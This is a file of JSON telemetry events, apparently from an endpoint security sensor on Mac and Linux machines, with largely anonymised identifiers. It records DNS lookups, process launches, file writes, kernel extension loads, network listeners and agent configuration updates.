+{"event_simpleName":"SuspiciousDnsRequest","ContextTimeStamp":"1625677493.531","ConfigStateHash":"3090255842","ContextProcessId":"364839648316192383","DomainName":"hg-t2.dotice.me","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"SuspiciousDnsRequestMacV1","id":"ffffffff-1111-11eb-a4a3-02cbdfb8f529","EffectiveTransmissionClass":"2","aid":"ffffffff0cd64fb78626ab1b6c65ac8c","timestamp":"1625677493756","cid":"ffffffff15754bcfb5f9152ec7ac90ac","RequestType":"1"} +{"Parameter2":"0","event_simpleName":"ErrorEvent","Parameter1":"18446744072635810412","Parameter3":"0","ConfigStateHash":"1156120155","aip":"67.43.156.14","Line":"96","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","ErrorStatus":"3759276032","name":"ErrorEventLinV1","id":"ffffffff-1111-11eb-bdd3-0681aa29cecb","Facility":"16778240","aid":"ffffffffabd047b1a86c1fcd8ef22b59","File":"0","timestamp":"1625677530922","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"event_simpleName":"ConfigStateUpdate","ConfigStateHash":"3090255842","ConfigStateData":"0,0,1007.4.0013701.1|1,2,1|1,4,a|1,6,0|1,8,46|1,a,1|1,c,0|1,17,1f|1,18,18|1,19,0|1,1e,407|1,21,3d2|1,27,1|1,53,18b|1,56,0|1,d0,16d|1,d1,0|1,d2,0|1,df,4c|1,e0,6|1,f6,1|1,1f5,1|1,1f7,1|1,1fd,1|1,200,0|2,0,138,a8000000032,140000000085,140000000153,18000000004c,18000000004f,180000000050,180000000051,180000000054,1800000000e1,1800000000e7,180000000144,18000000014e,18000000015a,18000000020e,180000000226,180000000227,180400000079,18040000009b,18040000009c,1804000000ff,180400000117,180400000118,180400000142,180400000163,180400000164,180400000166,180400000167,1804000001b2,1804000001f2,1804000001f3,180400000225,1804000002be,1804000002bf,1804000002ca,1804000002cb,1808000000c9,1808000000ee,1808000000fc,1808000000fd,1808000000fe,180c0000016b,180c0000016c,180c0000016d,180c0000016e,180c0000016f,180c00000170,180c000001b6,180c000001b7,180c000001b8,180c000001b9,180c000001f6,180c000001f7,180c000001f8,180c000002c2,180c000002c3,180c000002c4,180c000002ce,180c000002cf,180c000002d0,18100000011e,18100000011f,181000000120,181000000121,181000000122,181000000123,181000000124,181000000125,181000000126,181000000128,181000000169,18100000016a,181000000180,1810000001b1,1810000001c3,18100000021f,181000000220,18100000024e,18100000025b,181000000280,1810000002ad,1810000002d6,1810000002d7,1810000002f3,1c04000000a1,1c04000000a2,1c04000000a3,1c04000000a4,1c04000000a5,1c04000000a6,1c040000011a,1c040000011b,1c040000011c,1c0400000268,1c0400000269,1c040000026a,1c040000026c,1c040000026d,1c040000026e,1c0400000271,1c0400000272,1c0400000273,1c0400000275,1c0400000276,1c0400000277,1c040000028f,1c0400000290,1c0400000291,1c0400000293,1c0400000294,1c0400000295,1c0400000297,1c0400000298,1c0400000299,1c040000029b,1c040000029c,1c040000029d,1c040000029f,1c04000002a0|3,0,65|","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ConfigStateUpdateMacV2","id":"ffffffff-1111-11eb-8dc4-0
234c12f9875","EffectiveTransmissionClass":"0","aid":"ffffffffa15a452190ae454f7d33e07e","timestamp":"1625677530590","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"KextLoad","ContextTimeStamp":"1625677509.064","ConfigStateHash":"1620585913","ContextProcessId":"364867547408058681","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","BundleID":"com.apple.driver.AudioAUUC","Entitlements":"15","name":"KextLoadMacV1","id":"ffffffff-1111-11eb-a2ae-028f6bf89be7","EffectiveTransmissionClass":"2","aid":"ffffffffaa0e47a1b009aef151d6179d","timestamp":"1625677509069","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"ChannelVersion":"25","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"3155796140","aip":"67.43.156.14","ChannelVersionRequired":"0","ChannelId":"20","ConfigBuild":"1007.8.0011110.1","event_platform":"Lin","name":"ChannelVersionRequiredLinV1","id":"ffffffff-1111-11eb-b411-06baeacb7a63","aid":"ffffffff67d54f7daf3d998ffc74d48e","timestamp":"1625677507901","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"ProcessRollup2Stats","ConfigStateHash":"2037712541","Timeout":"60","ParentProcessId":"0","aip":"67.43.156.14","SuppressType":"3","SHA256HashData":"64e48365207d0c19008ba7d53d75c0de3fcd5a1590e4c40fc69c677663fedc20","ProcessCount":"60","BoundedCount":"57","ConfigBuild":"1007.8.0011308.1","UID":"115","event_platform":"Lin","CommandLine":"sh -c \"/usr/lib/erlang/erts-11.1.3/bin/epmd\" -daemon","Entitlements":"15","name":"ProcessRollup2StatsLinV3","id":"ffffffff-1111-11eb-b34e-063f4cefccb3","EffectiveTransmissionClass":"2","aid":"ffffffffe22549479fbe8293b6747a68","timestamp":"1625677511754","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"event_simpleName":"UserIdentity","LoginSessionId":"1138166333440","AuthenticationUuidAsString":"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109","UserName":"user1","ConfigStateHash":"3967242894","aip":"67.43.156.13","AuthenticationId":"265","UserPrincipal":"user1@dom1","UserSid":"S-1-5-21-3852557355-3178143607-2040168074-1530","ConfigBuild":"1007.4.0013701.1","UID":"265","event_platform":"Mac","Entitlements":"15","name":"UserIdentityMacV4","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","AuthenticationUuid":"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109","timestamp":"1625677478122","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"FeatureVector":"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","event_simpleName":"DeliverLocalFXToCloud","ConfigStateHash":"1620585913","aip":"67.43.156.14","ModelPrediction":"1436899696705536","SHA256HashData":"c89caf538788e6524bf4ae93194051f3389eecbc71e4793f12a2dc0368211cc2","Malicious":"0","ConfigBuild":"1007.4.0013701.1","FeatureExtractionVersion":"2","event_platform":"Mac","FXFileSize":"502032","Entitlements":"15","name":"DeliverLocalFXToCloudMacV4","PupAdwareDecisionValue":"12384657383358464","id":"ffffffff-1111-11eb-b44e-069a02b0ad6b","PupAdwareConfidence":"0","EffectiveTransmissionClass":"1","aid":"ffffffff45d647e6ae0ba8764a4bd570","MLModelVersion":"4","timestamp":"1625677489052","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"CreateProcessArgs","ContextTimeStamp":"1625677524.929","ConfigStateHash":"3090255842","ContextProcessId":"365035560818271291","ContextThreadId":"365035560818271291","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","CommandLine":"t.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/CategorySurfaceViewController.o -o 
/Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationActionView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationAddressView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationErrorView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationHeaderView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationLoadingView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationPostalCodeView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationViewController.o -index-store-path /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Index/DataStore 
-index-system-modules","Entitlements":"15","name":"CreateProcessArgsMac","id":"ffffffff-1111-11eb-8332-020506b18db5","EffectiveTransmissionClass":"2","aid":"ffffffffb3a3442585c05abc61e290fc","timestamp":"1625677525128","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/swift-frontend"} +{"event_simpleName":"PdfFileWritten","ContextTimeStamp":"1625677488.523","ConfigStateHash":"3090255842","ContextProcessId":"364156540965623394","ContextThreadId":"0","aip":"67.43.156.13","FileIdentifier":"05000001000000000000000000000000f1321d0000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"PdfFileWrittenMacV1","id":"ffffffff-1111-11eb-8903-022a1941b91f","EffectiveTransmissionClass":"2","aid":"ffffffffc4044541995bffd84b9df003","timestamp":"1625677488576","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/pt/s9pzbbwd07q_0fxqvfhc513r0000gp/T/com.microsoft.Excel/Content.MSO/mso6ACABA95"} +{"event_simpleName":"GroupIdentity","GID":"242","AuthenticationUuidAsString":"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2","ConfigStateHash":"3967242894","aip":"67.43.156.13","AuthenticationId":"1119489580471877843","UserPrincipal":"user2@dom1","UserSid":"S-1-5-21-3852557355-3178143607-2040168074-1485","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"GroupIdentityMacV2","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","AuthenticationUuid":"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2","timestamp":"1625677478379","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"event_simpleName":"MachOFileWritten","ContextTimeStamp":"1625622611.845","ConfigStateHash":"3967242894","MachOSubType":"3","ContextProcessId":"364938429384226082","Size":"0","ContextThreadId":"0","aip":"67.43.156.13","SHA256HashData":"c0f50d27fe9fb31e33d1ce6577eeb4d4e17639095ad20575da018d1fcf955198","FileIdentifier":"04000001000000000000000000000000ac41270400000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"MachOFileWrittenMacV3","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677479336","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/bf/dwpvdj3d1tq00l8fgs5rd7x00000gn/T/.net.example.desktop.ev80yl"} +{"event_simpleName":"NetworkListenIP6","ContextTimeStamp":"1625622608.014","LocalAddressIP6":"0:0:0:0:0:0:0:0","RemoteAddressIP6":"0:0:0:0:0:0:0:0","ConfigStateHash":"3967242894","ConnectionFlags":"0","ContextProcessId":"364938390018585510","RemotePort":"0","aip":"67.43.156.13","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"8770","Entitlements":"15","name":"NetworkListenIP6MacV10","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff44564c2f8d76394cb25c31ab","ConnectionDirection":"2","InContext":"0","timestamp":"1625677478929","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"CurrentSystemTags","ConfigStateHash":"3090255842","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","SystemTableIndex":"0","Entitlements":"15","name":"CurrentSystemTagsMacV1","id":"ffffffff-1111-11eb-b88d-06b7cb0d7bd7","EffectiveTransmissionClass":"0","aid":"ffffffff62714a708030d494ca0a7e60","Tags":"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 
26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584","timestamp":"1625677502693","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"event_simpleName":"NewExecutableWritten","ContextTimeStamp":"1625677533.027","ConfigStateHash":"1620585913","ContextProcessId":"362208380891022165","Size":"596224","ContextThreadId":"0","aip":"67.43.156.14","SHA256HashData":"70a06a11057efb22285a7200a53e5b6bae001fe0a98d4b23d0f6a31ad818a005","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NewExecutableWrittenMacV2","id":"ffffffff-1111-11eb-985c-02152dd35bc1","EffectiveTransmissionClass":"2","aid":"ffffffff28414c2293e35c360213e723","timestamp":"1625677533060","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.CVG7Ya/Zoom.app/Contents/MacOS/app_mode_loader","VnodeModificationType":"0"} +{"event_simpleName":"LfoUploadDataComplete","LfoUploadFlags":"4","AttemptNumber":"0","ConfigStateHash":"3090255842","SourceFileName":"/Users/user5/.rbenv/versions/2.6.5/bin/ruby","Size":"3876424","aip":"67.43.156.14","SHA256HashData":"d7b56e2a06304ecd343985a1aaedff2eb32ee1151bba0e152aff97c778b7562a","UploadId":"8023668629276690295","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LfoUploadDataCompleteMacV3","id":"ffffffff-1111-11eb-a2ab-024aafff599f","EffectiveTransmissionClass":"2","aid":"fffffffffbea48169985c2c2bae89d1d","Tags":"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 
26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584","timestamp":"1625677428827","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"LightningLatencyInfo","LightningLatencyState":"3","ConfigStateHash":"3090255842","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LightningLatencyInfoMacV1","id":"ffffffff-1111-11eb-b44e-069a02b0ad6b","EffectiveTransmissionClass":"0","aid":"ffffffffd452449b8d1eb7d85b146650","timestamp":"1625677453146","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"event_simpleName":"NeighborListIP4","ConfigStateHash":"1620585913","NeighborList":"40-C7-29-FF-FF-FF|192.168.2.1|1|64-9A-BE-FF-FF-FF|192.168.2.10|0|F0-FF-FF-FF-A0-14|192.168.2.43|0|DE-58-FF-FF-5D-3B|192.168.2.113|0|5E-AA-FF-FF-FF-20|192.168.2.128|0|44-FF-FF-FF-03-DD|192.168.2.136|0|EE-74-EE-EE-FF-0D|192.168.2.137|0|3A-FF-FF-FF-03-26|192.168.2.144|0|DE-79-FF-FF-FF-D4|192.168.2.145|0|0E-24-FF-EE-EE-87|192.168.2.152|0|CC-D9-AC-AF-66-F8|192.168.2.153|0|","aip":"67.43.156.14","InterfaceIndex":"6","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NeighborListIP4MacV1","id":"ffffffff-1111-11eb-9dc0-06c6f5278873","EffectiveTransmissionClass":"3","aid":"ffffffff8eb649cf8d82be1e65629a0e","timestamp":"1625677450083","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"ZipFileWritten","ContextTimeStamp":"1625677454.557","ConfigStateHash":"3090255842","ContextProcessId":"365039419134863763","ContextThreadId":"0","aip":"67.43.156.14","FileIdentifier":"07000001000000000000000000000000b1445a0900000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ZipFileWrittenMacV1","id":"ffffffff-1111-11eb-ab6e-0668ec51180b","EffectiveTransmissionClass":"2","aid":"ffffffff2d984e32b702789b54f0f811","timestamp":"1625677454723","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user6/Library/Developer/CoreSimulator/Devices/BCE6B46B-E863-4151-AA9D-D71C79438C47/data/Containers/Data/Application/1249A061-F246-4338-AE56-4373E918C9B4/Library/Application Support/com.instacart.instashopper/LogCache/2021-07-06T23:44:46.133Z.zip"} +{"AgentVersion":"6.24.13701.0","aip":"67.43.156.14","ConfigIDBase":"65994753","BiosReleaseDate":"01/06/2021","CpuFeaturesMask":"7494065083858915","ChasisManufacturer":"Apple Inc.","SystemSerialNumber":"C02F649EMD6R","event_platform":"Mac","AgentLoadFlags":"0","CpuVendor":"0","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","BiosVersion":"1554.80.3.0.0 (iBridge: 
18.16.14347.0.0,0)","CpuSignature":"591594","EffectiveTransmissionClass":"0","MoboProductName":"Mac-E1008331FDC96864","timestamp":"1625677460451","MicrocodeSignature":"16045690984229358334","event_simpleName":"AgentOnline","ContextTimeStamp":"1625677445.731","SystemProductName":"MacBookPro16,1","MoboManufacturer":"Apple Inc.","ConfigStateHash":"3967242894","ConfigBuild":"1007.4.0013701.1","SystemSku":" ","SensorGroupingTags":"","ConfigurationVersion":"10","AgentLocalTime":"1625677445.731","BiosManufacturer":"Apple Inc.","Entitlements":"15","name":"AgentOnlineMacV13","ConfigIDPlatform":"4","ComputerName":"comp2","ChassisType":"9","ConfigIDBuild":"13701","SystemManufacturer":"Apple Inc.","aid":"ffffffffbea440b9aad8b5bf222d303f","ProvisionState":"1","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"Zero"} +{"event_simpleName":"CriticalFileAccessed","ContextTimeStamp":"1625677438.515","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"365053399098988534","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","UID":"0","event_platform":"Mac","UnixMode":"384","Entitlements":"15","name":"CriticalFileAccessedMacV1","id":"ffffffff-1111-11eb-956a-02748d01bd3d","EffectiveTransmissionClass":"2","aid":"ffffffff8eca418b7a861be9c5f7de1d","timestamp":"1625677438553","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/dslocal/nodes/Default/users/daemon.plist"} +{"MajorVersion":"19","event_simpleName":"OsVersionInfo","OSVersionFileData":"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","ConfigStateHash":"3967242894","AgentVersion":"6.24.13701.0","aip":"67.43.156.14","MinorVersion":"6","OSVersionString":"Darwin Kernel Version 19.6.0: Tue Jan 12 22:13:05 PST 2021; 
root:xnu-6153.141.16~1/RELEASE_X86_64","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"OsVersionInfoMacV3","RFMState":"0","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","OSVersionFileName":"/System/Library/CoreServices/SystemVersion.plist","EffectiveTransmissionClass":"2","aid":"ffffffffbea440b9aad8b5bf222d303f","timestamp":"1625677462356","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"ConfigBuild":"1007.8.0010912.1","event_simpleName":"ConfigStateUpdate","event_platform":"Lin","ConfigStateHash":"1284133626","ConfigStateData":"0,0,1007.8.0010912.1|1,c,0|1,10,1|1,11,0|1,12,1|1,13,1|1,14,19|1,15,3|1,1f,4|1,22,3|1,3b,1|1,59,2d|1,d3,263|1,d4,0|1,eb,36|1,201,1|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|","name":"ConfigStateUpdateLinV1","aip":"67.43.156.14","id":"ffffffff-1111-11eb-8e88-068a8894a447","aid":"ffffffff4f4044b689d6420d303e4ecd","timestamp":"1625677436454","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"LFODownloadConfirmation","ConfigStateHash":"1333055909","aip":"67.43.156.14","DownloadServer":"lfodown01-b.cloudsink.net","DownloadPath":"/osfm/linux/bde98295e6e5fa4c6ba2acfebc2e9943c836bf2223aebb8b29e03c44df43cb53","DownloadPort":"443","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"LFODownloadConfirmationLinV1","CompletionEventId":"Event_KmaExtDownloadCompleteLinV1","id":"ffffffff-1111-11eb-8dee-0201f64cca29","aid":"ffffffff88b948c6abeeee910f6d8c33","timestamp":"1625677365906","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"KernelModuleArchiveExt11611"} 
+{"event_simpleName":"TarFileWritten","ContextTimeStamp":"1625677353.633","ConfigStateHash":"3090255842","ContextProcessId":"365049009681176519","ContextThreadId":"0","aip":"67.43.156.14","FileIdentifier":"050000010000000000000000000000005749420100000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"TarFileWrittenMacV1","id":"ffffffff-1111-11eb-9497-028a0bfcf603","EffectiveTransmissionClass":"2","aid":"ffffffffe6244708bd09a6c111f63f4a","timestamp":"1625677353895","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user7/.rbenv/versions/2.6.6/lib/ruby/gems/2.6.0/cache/database_cleaner-1.8.5.gem"} +{"event_simpleName":"AgentConnect","ConfigStateHash":"3967242894","NetworkContainmentState":"0","VerifiedCertificate":"7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf","aip":"67.43.156.14","ConfigIDBase":"65994753","FailedConnectCount":"404","ConnectType":"1","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","ConfigurationVersion":"10","Entitlements":"15","name":"AgentConnectMacV5","ConfigIDPlatform":"4","PreviousConnectTime":"1625673963.331","id":"ffffffff-1111-11eb-ba54-02a3616f6acd","ConfigIDBuild":"13701","ConnectTime":"1625677350.208","EffectiveTransmissionClass":"2","aid":"ffffffff2977460db2898ece881a9358","ProvisionState":"0","timestamp":"1625677350466","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"event_simpleName":"LFODownloadConfirmation","ConfigStateHash":"3090255842","aip":"67.43.156.14","DownloadServer":"lfodown01-b.cloudsink.net","DownloadPath":"metahash+/cfs/channelfiles/0000000503/66d5e9ea15754bcfb5f9152ec7ac90ac/C-00000503-00000000-00000001.sys","DownloadPort":"443","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LFODownloadConfirmationMacV1","CompletionEventId":"Event_ChannelDataDownloadCompleteMacV1","id":"ffffffff-1111-11eb-8b09-069ee8920171","EffectiveTransmissionClass":"0","aid":"ffffffff5e8b4724aa10088c4f71cd9a","timestamp":"1625677525235","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"C-00000503-00000000-00000001.sys"} +{"event_simpleName":"AsepFileChange","ContextTimeStamp":"1625677482.148","ConfigStateHash":"1620585913","ContextProcessId":"364936256754041721","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"AsepFileChangeMacV1","id":"ffffffff-1111-11eb-9e50-064be6e56df7","EffectiveTransmissionClass":"2","aid":"fffffffff1a64286a233d09974b1b377","timestamp":"1625677482403","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/System/Library/AssetsV2/com_apple_MobileAsset_MacSoftwareUpdate/5968e4faeba359dd5270ac282340cc4bd94d348c.asset/AssetData/payloadv2/ecc_data/System/Library/Spotlight/SystemPrefs.mdimporter/Contents/MacOS/SystemPrefs","VnodeModificationType":"6"} +{"event_simpleName":"TerminateProcess","RawProcessId":"76482","ContextTimeStamp":"1625677510.959","ConfigStateHash":"1284133626","ContextProcessId":"130732827553316","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.8.0010912.1","event_platform":"Lin","TargetProcessId":"130732827553316","Entitlements":"15","name":"TerminateProcessLinV2","id":"ffffffff-1111-11eb-97d0-02b2813216eb","EffectiveTransmissionClass":"2","aid":"ffffffffdd094539a02b394c69a70aaf","timestamp":"1625677511067","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"ConfigBuild":"1007.4.0013701.1","event_simpleName":"FirewallEnabled","event_platform":"Mac","ConfigStateHash":"3090255842","Entitlements":"15","name":"FirewallEnabledMacV1","aip":"67.43.156.14","id":"ffffffff-1111-11eb-a9e6-067d21325a03","EffectiveTransmissionClass":"2","aid":"ffffffff70cf4070af024397f25007c7","timestamp":"1625677372544","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"FsVolumeUnmounted","VolumeName":"Install Google Drive","ContextTimeStamp":"1625677332.283","ConfigStateHash":"3090255842","aip":"67.43.156.14","VolumeMediaBSDName":"disk2s2","VolumeMountPoint":"/private/tmp/KSInstallAction.dn6J5Xa1M4/m","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"FsVolumeUnmountedMacV1","id":"ffffffff-1111-11eb-8fd9-06866dcbd3d5","EffectiveTransmissionClass":"2","aid":"ffffffffed984e248973f3ada1eb543d","timestamp":"1625677334451","cid":"ffffffff15754bcfb5f9152ec7ac90ac","VolumeIsNetwork":"0"} +{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkListenIP4","ContextTimeStamp":"1625677474.525","ConfigStateHash":"2300098580","ConnectionFlags":"0","ContextProcessId":"328911864662804336","RemotePort":"0","aip":"67.43.156.14","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"23165","Entitlements":"15","name":"NetworkListenIP4LinV5","id":"ffffffff-1111-11eb-88fd-06a17d0fdc05","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff2a0d484da8f7a9cf8bde7164","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677474879","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
